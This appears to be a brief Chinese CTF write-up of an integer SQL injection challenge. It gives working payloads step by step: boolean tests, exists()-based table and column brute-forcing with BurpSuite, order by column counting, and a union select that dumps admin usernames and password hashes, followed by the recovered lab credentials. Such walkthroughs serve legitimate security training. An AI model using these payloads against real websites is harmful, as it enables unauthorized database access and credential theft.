题目介绍:

题目.PNG

判断注入:

使用语句:?id=1 and 1=1 页面回显正常
判断1.PNG

使用语句:?id=1 and 1=2 页面回显错误,判断为整型注入
判断2.PNG

获取数据库表:

使用语句:**id=1 and exists(select id from a)**用BurpSuite抓取进行爆破得到表admin,new,News
表2.PNG
biao1.PNG

获取表的字段:

使用语句:**?id=1 and exists(select a from admin)**,使用BurpSuite抓取数据包进行爆破得到 username,passwd
baopo1.PNG
baopo.PNG

判断数据库列数:

使用语句:?id=1 order by 1 ,用BurpSuite爆破可得到列数为4

列数.PNG
字段为4.PNG

判断回显位置:

使用语句?id=-1 union select 1,2,3,4 from admin 可知道回显位置是2和3
回显位置.PNG

获取字段值:

使用语句?id=-1 union select 1,username,passwd,4 from admin 得到用户名和密码
字段值.PNG

MD5解码:

解码得到密码

md5.PNG

获取Key:

用户名:moke 和 密码:27737201 登录可得key
key.PNG